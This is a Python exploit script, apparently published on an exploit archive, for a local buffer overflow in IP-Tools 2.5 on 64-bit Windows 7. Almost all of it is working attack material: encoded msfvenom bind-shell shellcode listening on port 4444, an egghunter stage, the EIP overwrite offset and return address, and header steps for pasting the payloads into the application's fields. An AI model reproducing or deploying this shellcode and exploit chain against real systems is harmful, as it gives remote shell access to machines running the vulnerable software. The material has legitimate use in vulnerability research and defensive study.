#!/usr/bin/env python
#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: IP-Tools 2.5 - Local Buffer Overflow(EggHunter) #
# Date: 2019-02-06 #
# Author: Juan Prescotto #
# Tested Against: Win7 Pro SP1 64 bit #
# Software Download #1: https://web.archive.org/web/20070322163021/http://hostmonitor.biz:80/download/ip-tools.exe #
# Software Download #2: https://www.exploit-db.com/apps/4a83348f18a18ba34f9747648b550307-ip-tools.exe #
# Version: 2.5 #
# Special Thanks to my wife for allowing me to spend countless hours on this passion of mine #
# Steps : Open the APP > SNMP Scanner > paste in contents from the egg.txt into "From Addr" > "Start" > Click "Options" > #
# "Host Monitor" --> "Logging" > paste in contents from the egghunter.txt into "Log to file" > OK > Bind Shell - Port 4444 #
#------------------------------------------------------------------------------------------------------------------------------------#
# Good Characters: alphanumeric and printable special characters #
# EIP Offset Overwrite ("Log to file" field): 264 #
# Non-Participating Modules: ip_tools.exe #
#------------------------------------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite --> #
# Stack Adjust (0x40) / RETN --> Egghunter Shellcode --> Egg Shellcode #
#------------------------------------------------------------------------------------------------------------------------------------#
##################EGG Shellcode Generation#################################
#msfvenom -p windows/shell_bind_tcp LPORT=4444 BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
#710 bytes + 8 bytes for egg identifier
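# Payload stage: the 8-byte tag "w00tw00t" that the egghunter scans memory for,
# followed by the 710-byte alphanumeric-encoded payload from the msfvenom
# command above (718 bytes in total). The encoded bytes below are all
# printable ASCII, which matches the "good characters" constraint in the header.
egg = "w00tw00t"
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
egg += "\x69\x6c\x4b\x58\x6d\x52\x35\x50\x35\x50\x75\x50\x63"
egg += "\x50\x4f\x79\x4d\x35\x36\x51\x4b\x70\x71\x74\x6e\x6b"
egg += "\x36\x30\x46\x50\x6e\x6b\x66\x32\x44\x4c\x6c\x4b\x63"
egg += "\x62\x54\x54\x4c\x4b\x72\x52\x65\x78\x34\x4f\x68\x37"
egg += "\x52\x6a\x34\x66\x50\x31\x59\x6f\x4c\x6c\x57\x4c\x53"
egg += "\x51\x71\x6c\x67\x72\x54\x6c\x31\x30\x5a\x61\x58\x4f"
egg += "\x34\x4d\x56\x61\x4f\x37\x68\x62\x4a\x52\x36\x32\x66"
egg += "\x37\x4e\x6b\x36\x32\x42\x30\x6c\x4b\x50\x4a\x35\x6c"
egg += "\x4c\x4b\x72\x6c\x44\x51\x44\x38\x78\x63\x32\x68\x55"
egg += "\x51\x78\x51\x43\x61\x6e\x6b\x76\x39\x45\x70\x75\x51"
egg += "\x59\x43\x6e\x6b\x33\x79\x42\x38\x4d\x33\x65\x6a\x71"
egg += "\x59\x6e\x6b\x36\x54\x4e\x6b\x36\x61\x78\x56\x46\x51"
egg += "\x49\x6f\x4e\x4c\x79\x51\x7a\x6f\x66\x6d\x35\x51\x48"
egg += "\x47\x36\x58\x79\x70\x30\x75\x39\x66\x33\x33\x33\x4d"
egg += "\x58\x78\x57\x4b\x73\x4d\x56\x44\x53\x45\x48\x64\x61"
egg += "\x48\x4e\x6b\x72\x78\x67\x54\x57\x71\x69\x43\x73\x56"
egg += "\x6e\x6b\x54\x4c\x50\x4b\x6c\x4b\x53\x68\x37\x6c\x73"
egg += "\x31\x58\x53\x4c\x4b\x74\x44\x4e\x6b\x67\x71\x48\x50"
egg += "\x4f\x79\x70\x44\x36\x44\x76\x44\x51\x4b\x71\x4b\x55"
egg += "\x31\x46\x39\x32\x7a\x63\x61\x4b\x4f\x6b\x50\x53\x6f"
egg += "\x61\x4f\x61\x4a\x4c\x4b\x62\x32\x6a\x4b\x6e\x6d\x31"
egg += "\x4d\x63\x58\x75\x63\x54\x72\x35\x50\x45\x50\x33\x58"
egg += "\x52\x57\x33\x43\x36\x52\x73\x6f\x62\x74\x33\x58\x30"
egg += "\x4c\x31\x67\x54\x66\x63\x37\x69\x6f\x6e\x35\x78\x38"
egg += "\x4e\x70\x63\x31\x37\x70\x43\x30\x35\x79\x4f\x34\x32"
egg += "\x74\x46\x30\x51\x78\x36\x49\x4f\x70\x52\x4b\x63\x30"
egg += "\x59\x6f\x38\x55\x73\x5a\x43\x38\x70\x59\x36\x30\x49"
egg += "\x72\x59\x6d\x57\x30\x52\x70\x47\x30\x50\x50\x51\x78"
egg += "\x5a\x4a\x44\x4f\x6b\x6f\x79\x70\x39\x6f\x39\x45\x4f"
egg += "\x67\x65\x38\x44\x42\x77\x70\x64\x51\x71\x4c\x6c\x49"
egg += "\x6d\x36\x32\x4a\x72\x30\x63\x66\x56\x37\x30\x68\x68"
egg += "\x42\x4b\x6b\x64\x77\x61\x77\x59\x6f\x39\x45\x70\x57"
egg += "\x35\x38\x6d\x67\x68\x69\x65\x68\x59\x6f\x6b\x4f\x4a"
egg += "\x75\x36\x37\x75\x38\x34\x34\x58\x6c\x57\x4b\x4d\x31"
egg += "\x49\x6f\x4a\x75\x51\x47\x4e\x77\x55\x38\x32\x55\x52"
egg += "\x4e\x70\x4d\x43\x51\x39\x6f\x6e\x35\x51\x78\x70\x63"
egg += "\x32\x4d\x33\x54\x77\x70\x6e\x69\x68\x63\x30\x57\x63"
egg += "\x67\x30\x57\x55\x61\x6b\x46\x71\x7a\x56\x72\x31\x49"
egg += "\x62\x76\x6d\x32\x79\x6d\x55\x36\x6a\x67\x62\x64\x51"
egg += "\x34\x67\x4c\x73\x31\x33\x31\x6e\x6d\x71\x54\x44\x64"
egg += "\x66\x70\x39\x56\x43\x30\x77\x34\x43\x64\x76\x30\x72"
egg += "\x76\x61\x46\x50\x56\x32\x66\x30\x56\x62\x6e\x72\x76"
egg += "\x53\x66\x61\x43\x52\x76\x62\x48\x44\x39\x78\x4c\x45"
egg += "\x6f\x4f\x76\x69\x6f\x68\x55\x6b\x39\x39\x70\x42\x6e"
egg += "\x66\x36\x50\x46\x69\x6f\x36\x50\x75\x38\x33\x38\x4b"
egg += "\x37\x67\x6d\x73\x50\x69\x6f\x6a\x75\x6d\x6b\x58\x70"
egg += "\x4d\x65\x79\x32\x76\x36\x75\x38\x4e\x46\x6f\x65\x6d"
egg += "\x6d\x6f\x6d\x69\x6f\x79\x45\x35\x6c\x73\x36\x31\x6c"
egg += "\x44\x4a\x6b\x30\x79\x6b\x4d\x30\x73\x45\x74\x45\x6f"
egg += "\x4b\x30\x47\x32\x33\x31\x62\x72\x4f\x52\x4a\x37\x70"
egg += "\x72\x73\x49\x6f\x7a\x75\x41\x41"
# Write the stage to egg.txt in the current directory. A context manager
# replaces the manual open/write/close so the handle is released even if the
# write raises. Text mode is kept as in the original; since every byte is
# ASCII no encoding translation takes place.
with open("egg.txt", "w") as f:
    f.write(egg)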
##################EGG Hunter Shellcode Generation#################################
#encode egghunter code (looking for w00tw00t) (wow64 egghunter code produced by mona) into only alpha characters; egghunter shellcode preceded by xor edx,edx (start egg hunting at 0x00000000)
#echo -ne "\x33\xd2\x31\xdb\x53\x53\x53\x53\xb3\xc0\x66\x81\xca\xff\x0f\x42\x52\x6a\x26\x58\x33\xc9\x8b\xd4\x64\xff\x13\x5e\x5a\x3c\x05\x74\xe9\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xe4\xaf\x75\xe1\xff\xe7" | msfvenom BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egghunter -p -
#150 bytes
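# Egghunter stage: the 150-byte alphanumeric-encoded hunter produced by the
# msfvenom command above. All bytes are printable ASCII.
egghunter = ""
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
egghunter += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
egghunter += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
egghunter += "\x42\x75\x4a\x49\x35\x63\x4b\x62\x30\x31\x4b\x6b"
egghunter += "\x52\x73\x56\x33\x46\x33\x46\x33\x58\x33\x49\x50"
egghunter += "\x45\x36\x6f\x71\x6a\x6a\x6b\x4f\x46\x6f\x31\x52"
egghunter += "\x66\x32\x72\x4a\x55\x76\x32\x78\x70\x33\x38\x49"
egghunter += "\x6e\x6b\x5a\x74\x55\x34\x79\x6f\x37\x63\x53\x6e"
egghunter += "\x62\x7a\x55\x6c\x66\x65\x51\x64\x4d\x39\x48\x38"
egghunter += "\x30\x77\x50\x30\x70\x30\x74\x34\x4e\x6b\x58\x7a"
egghunter += "\x6c\x6f\x51\x65\x4a\x44\x4e\x4f\x42\x55\x79\x71"
egghunter += "\x69\x6f\x6a\x47\x41\x41"
#0x00473259 : {pivot 64 / 0x40}[IP_TOOLS.EXE]
# Address 0x00473259 in ip_tools.exe, written little-endian; the header
# describes it as a 0x40 stack adjust followed by RETN. Its high byte is 0x00,
# so this is the only non-printable byte in the file and it is the last one.
eip = "\x59\x32\x47\x00"
# The hunter is padded with "A" up to the 264-byte EIP offset noted in the
# header, then the return address follows (268 bytes in total). If the hunter
# ever grew past 264 bytes the multiplication would go negative and silently
# produce no padding, leaving the address misaligned.
buffer = egghunter + "\x41" * (264 - len(egghunter)) + eip
# Write to egghunter.txt in the current directory; the context manager
# releases the handle even if the write raises.
with open("egghunter.txt", "w") as f:
    f.write(buffer)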